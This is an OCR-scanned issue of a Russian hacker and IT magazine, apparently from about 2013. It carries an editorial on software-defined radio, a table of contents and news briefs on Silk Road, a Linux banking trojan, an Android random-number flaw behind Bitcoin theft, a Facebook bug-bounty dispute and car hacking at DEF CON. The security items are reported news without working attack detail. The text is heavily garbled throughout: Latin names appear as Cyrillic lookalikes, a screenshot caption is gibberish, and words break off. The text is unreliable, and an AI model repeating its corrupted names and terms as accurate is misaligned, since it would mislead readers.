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НОВЫЕ ТОЧКИ СОПРИКОСНОВЕНИЯ 

История программно-определяемых радиосистем (50Р) 
началась настолько не ечера, что удивительно, что именно 
сейчас произошел какой-то всплеск интереса. 

Двадцать лет назад американским военным понадо- 
билась технология, которая могла бы работать с кучей не- 
совместимых между собой систем связи. Проект назвали 
ЗреакЕаэу. Видимо, то, с чем столкнулись армейские гики, 
и правда было настолько секретным и настолько бардач- 
ным, раз они назвали свое детище в честь притонов вре- 
мен сухого закона. Тем не менее уже тогда удалось что-то 
сделать, однако то, что получилось, требовало для работы 
ресурсов, доступных только военным. 

Через десять лет, в начале нулевых, к проблеме обра- 
тился частный сектор. Появились первые коммуникато- 
ры, и стало ясно, что карманному устройству необходимо 
работать с ОЗМ, ВІиеІооШ и ѲРЗ, становясь при этом все 
более компактным. Компьютеры стали намного мощ- 
нее, и теперь этой проблемой смогли заняться и те, кто, 
в отличие от военных, хорошо считает деньги, — теле- 
коммуникационные компании и производители техники. 
Но для обычных смертных все эти игрушки оставались не- 
досягаемыми. 

И вот, спустя еще десять лет, это дошло и до нас с вами. 
Паззл сложился из кучи маленьких деталей. С одной сто- 
роны — золотая эра информационной безопасности. Ко- 
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паться стали во всем, от промышленных систем до ави- 
ационных коммуникаций, С другой стороны — огромный 
интерес ко всему на стыке виртуального и физического, 
от 30-печати до автоматизации и робототехники. ЗОН — 
это еще один элемент, который сделает окружающий мир 
чуть более прозрачным и осязаемым для компьютеров. 

Однако еще большую роль сыграло и то, что в «желез- 
ный» мир все глубже проникают идеи, хорошо отработан- 
ные в софте. Уже становится понятно, что опенсорсные 
приемники НаскПР и ЫасІеВР сделают с ЗОН то, что Агбиіпо 
сделал с автоматизацией, РІерПар — с 30-печатью, 
а РагаІІеІа, возможно, сделает с многопоточными вычис- 
лениями. 

Илья Илембитов 

шеф- редактор X 
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«Гики изначально предрасположены к тому , чтобы делиться друг с другом 
знаниями. У нормальных людей это так не работает» 
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Все новое за последний месяц 
Битва мозгов 

Транспортировка людей по туннелю со скоростью 1200 км/ч 
Как случилась настоящая радиореволюция 
Первое поколение доступных ЗРРІ-трансиверов 

Делаем первые шаги с ПИ-ЗОВ 
Первое знакомство с виновником торжества 

Интервью с создателем Хабрахабра Денисом Крючковым 
Обзор четырехдискового МАЗ’а ОЫАР ТЗ-4210 
Тестирование процессора Іпіеі Соге І5-4670К 
Дополнительная защита для параноика 

Превращаем малиновый микрокомпьютер в универсальную ретроконсоль 

Как прошел финал конкурса МеоОІІЕЗТ-201 3 

Игровая консоль для настоящих гиков 

Как кастомизировать АпсІгоісІ, не устанавливая патчи 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Обходим ограничение на чтение файлов в МуЗСН. 

Обзор самых интересных плагинов для популярного дизассемблера 
Знакомимся с алгоритмами для быстрого поиска ЗСИ-инъекций 
И снова об этичности 

Обзор нового веб-стандарта и его фундаментальных уязвимостей 
7 утилит для взлома и анализа безопасности 

Перехват и динамическое изменение НТТР-пакетов ПО для удаленного администрирования 

17 халявных антивирусов между молотом и наковальней 

Классические приемы антиотладки, которые должен знать каждый 

Делаем систему распределенных вычислений на ѴѴіпскмз Аіиге 

Ускоряем разработку на С++ с помощью Воозі РуШоп 

Как хакеры восстанавливают забытые пароли с помощью С Зйагр 

Зря ты обходил стороной этот фреймворк! 

Спецвыпуск: задачи от Криса Касперски 
Восполняем пробелы в *піх-системах 

Ускорение вычислений и выполнения заданий путем распараллеливания процессов 

Упрощаем развертывание ѴѴіпсІоѵѵз 8 и ѴѴіпсІоѵѵз Зегѵег 2012 

Поднимаем непотопляемый шлюз при помощи САВР/рІзупс 

Поднимаем веб-сервер с максимальной изоляцией сервисов 

Вопросы и ответы 

8,5 Гб всякой всячины 

Удобные ѵѵеЬ-сервисы 
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Новость месяца 




ТОТ, КТО СТО И Т 

ЗАЗИКРОАй 

ЖУРНАЛ РОВВЕ5 СУМЕЛ ПООБЩАТЬСЯ С ХОЗЯИНОМ ТЕНЕВОГО АНАЛОГА АМА20Ы 



то такое Зіік Ноаб? Это анонимная торговая интер- 
нет-площадка, расположенная в зоне .опіоп, и на- 
стоящая головная боль для властей по всему миру. 
Зіік Поаб работает с 2011 года, и его частенько на- 
зывают еВау’ем или Атагоп’ом криминального 
мира (вполне заслуженно). 

Именно этот сайт приводили в пример сторон- 
ники ЗОРА. Пожалуй, это идеальное воплощение 
зла в Интернете вообще для любого, кому это нужно. И на то 
есть достаточно веские причины. Помимо нескончаемого по- 
тока нелегальных товаров, Зіік ПоасІ отличается еще и хоро- 
шей защитой. В качестве валюты площадка использует кри- 
товалюту Віісоіп, которая может гарантировать анонимность. 

Журнал РогЬее после нескольких месяцев бесплодных по- 
пыток сумел пообщаться с хозяином этого черного рынка, ко- 
торый известен в сети под псевдонимом из детской сказки — 
ТНе Эгеаб Рігаіе НоЬегіз (Ужасный пират Робертс). Приведем 
наиболее интересные моменты разговора. 

Оказалось, что Ужасный пират Робертс не основатель 
и не первый хозяин торговой площадки. Он попросту выку- 



пил ее у прошлого владельца, на контакт с которым вышел с тру- 
дом, найдя уязвимость на тогда еще совсем молодом сайте. Тот 
баг мог привести к деанонимизации оборудования и краже битко- 
инов. Сейчас Робертс тоже весьма обеспокоен тем, что Тог далек 
от совершенства, а влияние властей на ВС становится все сильнее, 
и не совсем ясно, насколько просто или сложно будет приобрести 
криптовалюту в будущем. Он сообщил, что для анонимности поль- 
зователей Зіік Поаб предпринимает множество мер, но в подроб- 
ностях говорить об этом отказался. Впрочем, Робертс вместе с тем 
и превозносит Віісоіп, уверяя, что криптовалюта помогает выигры- 
вать противостояние с государством. Но это как раз понятно, ведь 
если бы не ВС, Зіік Поасі не было бы вовсе. «Сейчас люди способны 
контролировать потоки и распределение информации, а также де- 
нежные потоки. Сектор за сектором мы выдавливаем государство 
из этого уравнения, возвращая власть людям», — говорит Робертс. 
Наглядный пример того, как технология трансформирует общество 
и мировой порядок, что и говорить. 

Также Робертс рассказал, что взломать их пытаются постоян- 
но, ведь Зіік Воаб — крупнейшая цель в Тог на сегодняшний день. 
Он назвал это даром и проклятием одновременно. 
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Ш Ежегодный оборот 5Мк Поасі оцени- 
вают в 14-15 миллионов долларов, 
а некоторые источники даже при- 
водят суммы в 30-45 миллионов. 

При этом биржа забирает себе около 
10% от суммы сделок. 
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ТРОЯНЕЦ 

дляишх 

ВИРУСОПИСАТЕЛИ НЕ ЗАБЫВАЮТ О ПОЛЬЗОВАТЕЛЯХ 
МЕНЕЕ ПОПУЛЯРНЫХ ОС 



прусами, ориентированными на «яблочную» продукцию, 
уже никого не удивишь, хотя еще несколько лет назад миф 
о том, что на Мас’ах вирусов нет, был крепок. В наши дни 
малварь есть для всех ОС и никто не остается обиженным. 
Лишнее тому доказательство представили исследователи из компа- 
нии НЗА, недавно обнаружившие банковский троян Напб оТ ТбіеТ, чья 
цель — пользователи Ыпих. 

Специалисты НЗА говорят, что троян уже вовсю продают на черном 
рынке, по цене примерно две тысячи долларов за копию. Притом ав- 
торы зловреда предлагают последующую поддержку и обновления. 
За три тысячи доступен набор код Напб о^ ТІііеІ плюс система для веб- 
инъекций. То есть цены примерно аналогичны ценам на малварь 
для Міпбоѵѵз. Авторы уверяют, что тестировали свое детище на 15 раз- 
личных дистрибутивах (включая ІІЬипІи, Ребога и РеЬіап). Единствен- 
ным утешением остается тот факт, что для установки трояна на ма- 
шину жертвы нужно использовать социальную инженерию и другие 
хитрости. Пользователь должен поставить троян сам. 

Угрозу Напб оі ТМіеТ представляет пока исключительно для дес- 
ктопных версий Ыпих. Работает он весьма традиционно: после уста- 
новки в системе жертвы перехватывает данные из веб-форм (даже 
если те передаются по НТТРЗ), открывает доступ к бэкдорам и пы- 
тается затруднить работу либо вовсе блокировать антивирусное 
ПО на компьютере. 




Авторы троянца уверяют, 
что Напсі оіТЫе^успешно 
перехватит данные, переда- 
ваемые какчерез НТТР, так 
и через НТТРЗ, в таких бра- 
узерах, как РігеТох, Соодіе 
СП готе, а также в браузерах, 
заточенных исключительно 
под Ыпих. 
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ЧЕРЕЗ ДЫРКУ В АШРОЮ 
УТЕКАЮТ ВС 



НЕПРИЯ 
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НЫЙ БАГ В ГЕНЕРАТОРЕ ПСЕВДОСЛУЧАЙНЫХ ЧИСЕЛ 



есьма досадный баг обнаружили в этом месяце сразу несколько 
Віісоіп-разработчиков. Проблема закралась в саму ОС Апбгоіб, 
а именно в компонент генерации случайных чисел, Разумеет- 
ся, из-за этого уязвимость затрагивает абсолютно все ВФсоіп- 
программы, работающие с андроидом, да и вообще все приложе- 
ния, использующие встроенный баѵа СгурІодгарНу АгсЫіесІже. 

Увы, неприятную находку подтвердили и в Ѳоодіе. Инженер по систем- 
ной безопасности Апбгоіб Алекс Клюбин опубликовал официальные дан- 
ные о причинах уязвимости. Он сообщил, что «плохие» последовательности 
псевдослучайных чисел поступают также и в приложения, которые напря- 
мую обращаются к системному РПЫО от Ореп38І_ без явной инициализации 
на Апбгоіб. И опубликовал пример того, как приложения должны правильно 
обращаться к РНМО, чтобы получить нормальную последовательность. 

Уже доподлинно известно о краже 55 ВТС из ВС-кошелька, сгенериро- 
ванного в Апбгоіб -приложении. А в Зутапіес подсчитали, что уязвимости 
подвержены до 360 тысяч приложений, которые полагаются на интерфейс 
ЗесигеПапбот. Баг актуален для всех версий ОС. 






— > В Тѵѵіііег теперь можно 
жаловаться на сообщения других 
пользователей и на пользователей 
вообще. Помочь в этом призвана 
новая функция ПероП ^ог аЬизе. 



— > В декабре прошлого года 
взломать сервер, выдающий 
себя за насосную станцию в США, 
пытались китайские хакеры, со- 
общила Тгепб Місго, проводившая 
этот опыт. 



— > Популярность Тог растет. Ра- 
нее число запросов к спискам ри- 
леев составляло порядка 50 тысяч 
в день, но после РПІ5М и публика- 
ций в СМИ выросло до 120 тысяч. 



— > РауРаІ наконец действитель- 
но заработала в России. Система 
работает с рублями, позволяет 
россиянам принимать платежи 
и выводить средства в российские 
банки. 








6 МЕОАЫЕШ5 



НАГРАДУ ДЛЯ 
ХАКЕРА СОБИРА- 
ЛИ ВСЕМ МИРОМ 



КАК НАИТИ УЯЗВИМОСТ 



АСЕВООК И НЕ ПОЛУЧИТЬ ЗА ЭТО НИЧЕГО 



П алестинский хакер Халил Шритех нашел уязви- 
мость в РасеЬоок, позволяющую разместить за- 
пись на стене любого пользователя, даже если тот 
не находится в списке друзей. К сожалению, тех- 
поддержка социальной сети не восприняла пар- 
ня всерьез (хотя он продемонстрировал работу уязвимости), 
и хакеру пришлось пойти на крайние меры — разместить со- 
общение о баге на стене Марка Цукерберга, даже извинившись 
перед последним. 

Конечно, после такой демонстрации уже через несколь- 
ко минут с хакером связались более адекватные сотрудники 
РасеЬоок и разобрались с проблемой. Но вот беда — возна- 
граждения палестинцу уже не полагалось, ведь в условиях про- 
граммы вознаграждения четко обозначено, что для проверки 
«дырок» нужно использовать тестовые аккаунты, а не реальные 
страницы других пользователей (без разрешения). Такое ре- 
шение РасеЬоок здорово возмутило сообщество ѵѵНііе ЬаТов, 
которое не замедлило объявить сбор средств для коллеги 
на краудфандинговом ресурсе СоРипсіМе. В итоге было собра- 
но более десяти тысяч долларов! 



ОІ-іке 

И ниц и ативу запустил 
Марк Майффрет, тех- 
нический директор ИБ- 
компании ВеуопсІТгизі, 
Он же внес вклад 
в размере трех тысяч 
долларов. Столько же 
вложил основатель 
компании еЕуе Рідііаі 
Бесигііу Фираз Баш- 
мак. Остальную часть 
суммы собрали с миру 
по нитке. 




Магк 2искегЬегд © 



ІіпіеПгіе АІюиЕ РЬоСоз Итепбз 
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Щй«і Рак) А№о, СаМогта 
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Рігя Боггу Рог Ьгеакгпд уоиг рпѵасу апй рой іо уоиг ѵ.аІІ . і Ьаз по оЬЬег Аоісе іо 
таке авег аЗі ЬЬе героггз і зепііо РасеЬоок іеагп . 

Му лате \ь КНАІЛ, Фот Рабате - 
5ее Моге 



РоЛсѴі'есІ Ьѵ 18,021.114 реор)е 



Иі КІіаІіЦ I ат юггу ікы іь н-оГ в Ьид. ТЬалка, ЁшгакиІ ЬесипЁ - РаіІеЬні.сспч 




— > Хакер Эндрю Джеймс 
Миллер пытался продать доступ 
к суперкомпьютеру Национальной 
лаборатории Лоуренса за 50 тысяч 
долларов. Теперь умельцу грозит 
18 месяцев тюрьмы. 



— > Ким Дотком и команда Меда 

готовятся запустить свою защи- 
щенную почту на смену почившему 
сервису ЬаѵаЬіі, о чем Дотком 
сообщил в Тѵѵіііег. 




ТРАФИКА 

АНАЛИЗИРУЕТ АНБ 



— > АНБ США пытается успокоить обще 
ственность и сообщает, что анализи- 
рует лишь небольшой процент данных, 
ежедневно циркулирующих в Сети. По 
заявлению, затрагивается только 1,6% 
из 1826 Пб данных, и уточняет, что толь 
ко 0,025% затем отбирается для ана- 
лиза. Но что в других 98,4% трафика? 
Видео, порно, торренты? 



НОВЫЙ РЕКОРД 

КРАУДФАНДИНГА 

ПОСТАВИЛ 

іівііытііеосіе 



Устройству компании СапопісаІ 
удалось поставить рекорд по сбору 
средств — смартфон ЦЬипіи Есіде сумел 
привлечь на сайте Іпсііедодо без малого 
13 миллионов долларов. Однако этого 
оказалось недостаточно. Выяснилось, 
что СапопісаІ рассчитывала на сумму 
не менее 32 миллионов долларов, так 
что смартфона, увы, не будет. 
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ВЗЛОМ МАШИНЫ — 
ОПАСНАЯ РЕАЛЬНОСТЬ 



НАЧ 



Ч г. 






СОИ 21 ПРОДЕМОНСТРИРОВАЛИ ВЗЛОМ ДВИГАТЕЛЯ И НЕТОЛЬКО 



Х акер, представившийся как 2. ог из СаппуІорИіс Резідп, прочел на ежегодной 

конференции РЕР СОЫ весьма пугающий доклад о взломе автомобильных 
электронных систем. 

Группа независимых исследователей, в которую вошли 2ог, а также 
два именитых эксперта Чарли Миллер и Кристофер Валачек, почти год за- 
нималась изучением возможностей взлома двух популярных моделей автомобилей. Мо- 
жет быть, ты помнишь, что похожие доклады уже наделали немало шума на ОЕР СОЫ 2010 
и 2011 годов, однако подробности тех хаков не были задокументированы и представлены 
в открытом доступе. Но на этот раз хакеры настроены более решительно. 

В самом начале презентации Миллер и Валачек признались, что они не большие ге- 
нии «хардверного хакинга» и от подопытной машины им нужно было лишь одно — чтобы 

та могла ехать сама. В итоге для экс- 
периментов были выбраны Тоуоіа Ргіиз 
2010 года и Роге! Езсаре 2010 года. Авто- 
ры методики начали с того, что раньше 
взлом электронных систем в автомоби- 
лях преимущественно ограничивался 
получением доступа к информационно- 
развлекательным системам машины. 
В этом же случае речь пошла о полу- 
чении доступа к служебным системам, 
то есть тем, что отвечают за работу 
главных систем — тормозной, руле- 
вой и двигательной. Хакеры уверены, 
что в скором будущем автохаки будут 
распространены не меньше, чем сейчас 
компьютерные. 

202 объяснил, что большая часть ав- 
томобильных систем построена по оди- 
наковому принципу, так что ждать 
расцвета автохаков осталось действительно недолго. Конечно, почти для всех показан- 
ных взломов необходимо получить физический доступ к автомобилю, но это почему-то 
не слишком утешает. На ОЕР СОЫ продемонстрировали видео, показывающие, как можно 
заблокировать тормоза и повороты рулевого колеса, резко поддернуть ремни безопас- 
ности, помигать лампочками в салоне или фарами, посигналить и даже заглушить дви- 
гатель во время езды! Также показали манипуляции с датчиками уровня топлива в баке. 
Разумеется, такие взломы могут оказаться смертельными в самом прямом смысле этого 
слова. В том числе для машины — после одного из экспериментов Ргіиз вообще перестал 
заводиться и отправился в автосервис, где лишь удивленно развели руками и сказали, 
что не сталкивались с подобными проблемами и не уверены, что смогут починить маши- 
ну. К слову, хакеры обещают опубликовать 101 страницу документации и кода в ближай- 
шее время, так что уже можно начинать бояться. 
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В то же время ученые из 
Бирмингемского уни- 
верситета совместно с 
голландскими крипто- 
графами разработали 
метод взлома автомо- 
бильных иммобилайзе- 
ров, а именно системы 
МедатоэСгурІо. Ее 
использует автомо- 
бильный концерн 
Ѵоікзшадеп Огоир (в 
том числе в люксовых 
моделях Аисіі, ВепІІеу, 
І_атЬогдЫпі и Рогзс^е). 
Концерн в судебном 
порядке запретил ис- 
следователям публи- 
ковать подробности 
о взломе. 




ТЫ В РАСЕВООК, ДАЖЕ 
ЕСЛИ ТЕБЯ ТАМ НЕТ 

— Компания РасеЬоок призналась, что создавала 
«скрытые профили» для пользователей, не зареги- 
стрированных в социальной сети, и собирала данные 
о них. РасеЬоок уверяет, что подобное происходило 
из-за бага в официальном мобильном приложении, 
которое часто предустановленно на разных гаджетах. 




БОЛЬШЕ ПИРАТСТВА, 
БОЛЬШЕ! 

— > ТИе Рігаіе Вау и независимые эксперты поймали 
юридическую фирму РгелЬа І_аѵѵ на нарочитой раздаче 
пиратского контента через торрент-файлы. Юристы 
пытались поднять уровень пиратства и тем самым 
увеличить суммы компенсаций для своих клиентов. 
Судебный иск на Ргепсіа І_аѵѵ уже подан. 




ЗАРАБОТОК НА МАЛ ВАРИ 
ВСЕ ПОПУЛЯРНЕЕ 



Исследование компании Боскоиі МоЬіІе Зесигііу 
показало, что продажа мобильной малвари в России 
становится все популярнее. «Появляются многочис- 
ленные команды-стартапы, специализирующиеся 
на подобной деятельности», — говорят в Боскоиі;. 
Зарабатывают такие команды 700-12 000 долларов 
в месяц. 
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ПЕРЕМЕНЫ В МІСНОЗОРТ 







последний год компанию МісгозоЙ постигло множество перемен. Громкие 
увольнения начались еще зимой 2012 года со Стивена Синофски — вице-пре- 
зидента компании, который неожиданно оставил МісгозоИ: «из-за внутреннего 
конфликта», через три недели после выхода ѴѴіпсІоѵѵз 8. Затем компанию по- 
кинул Дон Меттрик, возглавлявший подразделение по разработке ХЬох Опе. 
Что характерно, компанию он оставил спустя пару недель после (довольно странного) 
анонса новой консоли. Тогда же появились первые комментарии от «проверенных источни- 
ков» о том, что в компании идет глобальная реструктуризация. Подробных данных об этом 
процессе до сих пор нет, однако сообщалось, что именно перестановки внутри Місгозой 
побудили Меттрика уйти. 

Что за реструктуризацию проводит софтверный гигант? В июле Стив Балмер рассказал, 
что компания сокращает количество подразделений и намеревается выдвинуть на первый 
план бизнес по производству оборудования и деталей, а также интернет-услуги. По сути, 
разрозненные и зачастую конкурирующие подразделения компании сократили, объеди- 
нили и начали строить единую вертикаль. Скажем, бывшая глава подразделения ѴѴіпсІоѵѵз 
Джули Ларсон- Грин теперь будет руководить производством всех устройств вообще (в том 
числе ХЬох и Зіліасе). 

Во главе новой вертикали топ-менеджеров должен был закономерно оказаться Стив 
Балмер, однако в этом месяце стало известно, что в течение 12 месяцев Балмер оставит 
пост генерального директора, который он занимал с 2000 года. Это известие крайне удиви- 
ло рынок, хотя многие аналитики уверены, что Балмеру пора на покой, ведь он уже упустил 
множество ключевых моментов — планшеты, облака, мобильные устройства... «Для по- 
добных перемен не бывает удачного времени, но сейчас момент подходящий. Я исходно 
предполагал подать в отставку именно в середине нашей трансформации в „компанию 
устройств и сервисов 1 *», — пишет Балмер. 

В компании был организован специальный комитет, в который вошел и Билл Гейтс. 
На эту группу возложена задача поиска нового главы компании. Помочь МісгозоТС в этом 
должна также маститая рекрутинговая фирма $1шддІез Іпіегпаііолаі Іпс. Кстати, одним 
из вероятных преемников вновь называют Стивена Синофски. 




МІСГ050П 






Также недавно стало 
известно э что МісгоеоН 
покупает подразде- 
ление Мокіа Оеѵісез & 
Зегѵісез и лицензирует 
патенты и картографи- 
ческие сервисы Нокіа. 
По условиям сделки 
за Оеѵісез&Зегѵісез 
компания МісгозоТі за- 
платит 3,79 миллиарда 
евро. И в 1 ,65 милли- 
арда евро обойдутся 
лицензии на патенты 
Нокіа. 




НЕМНОГОО носимых 

ГАДЖЕТАХ 

— > Ѳоодіе ѲІазз лишь готовят к выпуску, а очки уже 
успели запретить водителям в Великобритании. Если 
тебя поймают в ѲІазз за рулем, придется заплатить 
штраф 60 фунтов (около 90 долларов), В то же время 
полиция Калифорнии признала удачным эксперимент 
с очками-видеорегистраторами, что входу 
с 2012 года. 




ХРОМБУКИ В РОССИЮ 



— > Юлия Соловьёва, глава российского подразде- 
ления Ѳоодіе, недавно заявила в интервью жур- 
налу РогЬез: «Мы очень хотим привезти в Россию 
СЬготеВоокз. Они очень дешевые (в Америке стоят 
150-200 долларов) и безумно быстрые. Мы еще 
не решили, с чего начнем: с розницы или крупных 
компаний». 




БЕКІОѴО ОБНОВИЛА 
ЛИНЕЙКУ ТНІЫКРАО 

— > Модельный ряд\А/іпРошз-лаптопов ТІтіпкРаР 
обновился, они стали компактнее и легче. Также был 
увеличен трекпад и срок автономной работы. В серии 
Т появилось две 14-дюймовые модели ультрабуков — 
Т440 и Т440з. Вторая может похвастаться процессо- 
ром Соге і7 и сенсорным дисплеем РиІІ НО. 
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роект тіппо\л/ЬоагсІ.огд, что функционирует «под крылом» корпорации 
ІпіеІ, объявил о начале поставок одноплатного Ореп Нагбѵѵаге компьютера 
Міппо\л/ВоагсІ. 

Плата представляет собой следующее: МіппоѵѵВоагсІ оснащен 32-раз- 
рядным одноядерным процессором Іпіеі Аіот Е640, работающим на ча- 
стоте 1 ГГц, видеоадаптером ІпіеІ ОМА 600, 1 Гб оперативной памяти и 4 Мб флеш- 
памяти. Новинка поддерживает карты памяти тісгоЗО, подключение накопителей 
с интерфейсом 8АТА II (3 Гбит/с), подключение ЦЗВ-устройств, имеет линейный ау- 
диовход/выход и поддержку локальных сетей со скоростью до 1 Гбит/с, Размер пла- 
ты 10,7 х 10,7 см. На борту этой крошки установлен дистрибутив Апдзігот І_іпих. Цена 
миникомпьютера — 199 долларов. 

Кроме перечисленного, можно приобрести еще и платы расширения, которые 
можно разместить над самим МіппоѵѵВоагсІ, своеобразной надстройкой в несколько 
«этажей». Энтузиастам также придется по душе, что на сайте тіппоѵѵЬоагсі.огд можно 
найти любую документацию, в том числе чертежи и схемы платы. Но главное — все- 
ми этими материалами можно пользоваться в рамках открытой лицензии Сгеаііѵе 
Соттопз. Одноплатные ПК на базе архитектуры Іпіеі и раньше пользовались попу- 
лярностью в определенных кругах, а теперь все это может приобрести куда более 
массовый характер. 




Разработчики стре- 
мились создать 
на базе архитек- 
туры Іпіеі макси- 
мально открытый 
продукт, который 
можно легко ско- 
пировать. Поэтому 
МіппоѵѵВоагсІ со- 
стоит из довольно 
старых компонен- 
тов (процессор 
вышел еще в 2010 
году) — они дешев- 
ле и их легко найти. 




ЧИТАЙ, НЕОТВЛЕКАЙСЯ 

ОПТИМИЗИРОВАТЬ ПРОЦЕСС ЧТЕНИЯ ТОЖЕ ВОЗМОЖНО 



Е сть в Сети такая популярная платформа для онлай- 
нового обучения — МІпсІТІазб. Эти ребята предо- 
ставляют базу для разнообразных онлайновых кур- 
сов, скажем, здесь компании могут легко обучать 
своих сотрудников. И создатели МіпсШазб приду- 
мали, как «проапгредить» процесс обучения. 

Система РосизАззізІ создана учеными из Стэнфордского 
университета и компанией Зепзіоп. Авторы уверяют, что одно- 
именная функция, уже добавленная в обучающее приложение 
МіпсНІазІп под іРаб, первая в своем роде, никто еще не пробовал 
использовать подобные методы в обучении. Суть проста — про- 
грамма отслеживает направление взгляда пользователя, пока 
тот, к примеру, читает текст. Если пользователь отвлекся (отвел 
глаза), Зепзіоп приостановит изложение материала. Хочется 
сказать спасибо, что при этом пользователя не бьют током, «не- 
навязчиво» рекомендуя вернуться к делу :). 

Разработку также планируют применять в школах и универ- 
ситетах для повышения эффективности обучения. 





А Популярность блокиров- 
щиков рекламы стремительно 
растет — 43% в год. Сейчас около 
30% аудитории (34% у хакер. ги) 
различных сайтов не видят рекла- 
му, сообщает РадеРаіг. 
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— > Выложили в открытый 
доступ ІР-адреса почти 500 
пользователей «защищенного» 
мессенджера Віітеззаде. Собрать 
их удалось при помощи обычной 
спам -рассылки. 



— > Согласно рейтингу Заис 
І_аЬз, самым ненадежным 
браузером в очередной раз при- 
знан Іпіегпеі Ехріогег. Он сбоит 
на 0,25% чаще, чем Заіагі, Орега, 
С Іі го те и Рігеіох. 



во втором квартале 2013 года 
составила 47,4 миллиона пакетов 
в секунду, что на 1655% больше, 
чем в 2012-м, подсчитали в РгоІехіс 
ТесГіпоІодіез. 
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ОБЪЕКТИВ ДЛЯ 
ЛОМОГРАФИИ 




О казывается, у ломографии очень много поклонни- 
ков. Ну или на планете развелось огромное количе- 
ство хипстеров, которым некуда потратить деньги :). 
Чем еще объяснить огромную популярность проекта 
по выпуску объектива Петцваля для современных 

камер? 

Небольшая справка; в 1840 году физик и математик Йозеф 
Петцваль создал упомянутый объектив. Он имеет характер- 
ный рисунок с высокой резкостью в центре кадра, спадающей 
к краям, хорошей коррекцией большинства искажений, выра- 
женной кривизной поля изображения и виньетированием. Одна 
из главных отличительных черт объектива — высокая светосила, 
которой и объясняется его популярность в портретном жанре. 

Но все это дела давно минувших дней. А современную вер- 
сию объектива Петцваля с фокусным расстоянием 85 мм и мак- 
симальной диафрагмой Р/2,2 по заказу І_отодгарІту решило 
выпустить российское предприятие — открытое акционерное 
общество «Красногорский завод им. С. А. Зверева» (произво- 
дитель камер марки «Зенит»). Проект получил на Кіскеіагіег 
оглушительный успех, так что старым-новым объективам быть. 



Для производства 
объектива необходимо 
было собрать 100 тысяч 
долларов, но эта от- 
метка была достигнута 
всего за четыре часа 
после начала сбора 
средств! В итоге же 
сумма и вовсе пере- 
валила за миллион 
триста тысяч долларов. 
Ориентировочная роз- 
ничная цена продукта — 
499 долларов. 





— т* Атагоп наконец-то раз- 
решил доставку потребительских 
электронных товаров в Россию. 
Официально «можно» стало 
со 2 сентября текущего года. 




— > За год Арріе утратила почти 
половину своей доли рынка план- 
шетов, сообщает ЮС. Аналитики 
объясняют это простым насыщени- 
ем рынка. 




— Вслед за РасеЬоок компания Ооодіе от- 
читалась о выплатах по своим программам 
вознаграждения за найденные уязвимо- 
сти. За три года исследователи обнаружи- 
ли более 2000 багов в разных продуктах, 
за которые Ооодіе суммарно заплатила 
уже 2 миллиона долларов вознагражде- 
ний. В среднем получилось по тысяче 
за один баг. 



УАНОО! ПРОДАЕТ 
НЕИСПОЛЬЗУЕМЫЕ 
АККАУНТЫ 



На интересный шаг пошла компания 
ѴаИоо! — запустила сервис продажи не- 
использующихся аккаунтов. Всего за 1 ,99 
доллара можно подписаться на монито- 
ринг пяти любых имен и ждать, когда те 
освободятся. Напомню, что если почта 
не используется год — аккаунт считается 
недействительным. 
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БргеасЫіееІ 



□гаштд 



Рогттиііл 



СЗррп а гіогитрпі 



н м уть выше мы рассказывали об изменениях, постигших за последний год корпо- 

рацию МісгозоЙ, но все эти пертурбации не идут ни в какое сравнение с исто- 
рией, приключившейся недавно в Соодіе. 

Н В конце августа стало известно, что Соодіе покидает вице-президент 
по управлению разработкой и выпуском операционной системы Апбгоіб Хью- 
го Барра, и кто заменит его на этой должности, пока неизвестно. Барра не только один 
из ключевых АпсІгоісІ-разработчиков, он еще и одна из публичных фигур Соодіе. Он регу- 
лярно появлялся на различных мероприятиях, где представлял новые продукты. Скажем, 

именно он недавно проводил презента- 
цию планшета Ыехиз 7 второго поколения 
во время ивента в Сан-Франциско. Уходит 
Барра не в пустоту, а в китайскую компа- 
нию Хіаоті, на должность вице-президен- 
та глобального бизнеса. Хіаоті выпускает 
АпсІгоісІ-смартфоны для китайского рын- 
ка, дополняя гугловскую ОС собственным 
программным обеспечением. Кстати, 
основатель Хіаоті Лин Бин тоже когда-то 
работал в Соодіе. 

Что же «криминального» в этой исто- 
рии, спросишь ты? Дело в том, что уход 
Барра из компании совпал с громкой но- 
востью о разводе сооснователя Соодіе 
Сергея Брина с женой Анной Войжитски. 
И неспроста. Западные СМИ быстро вы- 
яснили, что причина развода (и, скорее 
всего, ухода Барра из компании) — роман Брина с 26-летней Амандой Розенберг, ответ- 
ственной за маркетинг Соодіе СІазз, которая по совместительству является еще и быв- 
шей девушкой Барра, В свое время Аманду из Лондона привез с собой Барра. Он устроил 
ее в отдел маркетинга, сначала в С+, а затем уже в Соодіе СІазз, где Аманда и познако- 
милась с Сергеем Брином. И хотя теперь Барра отрицает тот факт, что его уход из Соодіе 
как-то связан с этими любовным перипетиями, почему-то мне кажется, что Барра 
лукавит :). 

Также стоит отметить, что развод Брина не должен никак сказаться на Соодіе, — ак- 
ционерный состав компании надежно защищает брачный контракт. Дело в том, что у Анны 
Войжитски не только есть свой бизнес (частная биотехнологическая компания 23апс1Ме, 
где компания Соодіе и лично Брин выступают инвесторами), также у нее есть сестра 
Сьюзан Войжитски, которая на данный занимает должность старшего вице-президен- 
та Соодіе по рекламе и коммерции. Вот такая Санта-Барбара, дорогой читатель. К тому 
же слухи утверждают, что оскорбленный Барра сейчас активно пытается переманить 
в Хіаоті бывших коллег из Соодіе. 



Уход Барра из ком- 
пании совпал 
с громкой ново- 
стью о разводе со- 
основателя Соодіе 
Сергея Брина с же- 
ной Анной Войжит- 
ски. И неспроста 




А вот и та самая Аманда 
Розенберг, отвечаю- 
щая в Соодіе за про- 
движение Соодіе СІазз 
и распад семьи Брина. 



АВТОМАТИКА НЕ ВСЕГДА 
ХОРОШО 



-А Компания МісгозоЛ, в рамках борьбы с копиями 
пакета М3 ОЛісе, попросила Соодіе удалить из по- 
исковой выдачи ссылки на пакет ОрепОЛісе.огд. 
Разумеется, это не злой умысел, а ошибка автома- 
тики. По той же причине М3 недавно просила Соодіе 
блокировать страницы тісгозоЛ.сот. 




ВРЕМЯ — ДЕНЬГИ 

> В середине августа все серверы Соодіе пережили 
сбой, отключившись на две минуты. Мировой трафик 
за это время сократился на 40%! Более длительный 
сбой пережил Аплагоп. Он был недоступен порядка 
получаса для США, Канады и части Европы. Минута 
простоя обошлась магазину в 66 240 долларов. 
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ПИРАТСКИЙ БРАУЗЕР 
ЗАПУЩЕН 

— > На волне всеобщей паранойи и истерии Тйе Ріга!е 
Вау представил собственный защищенный и аноним- 
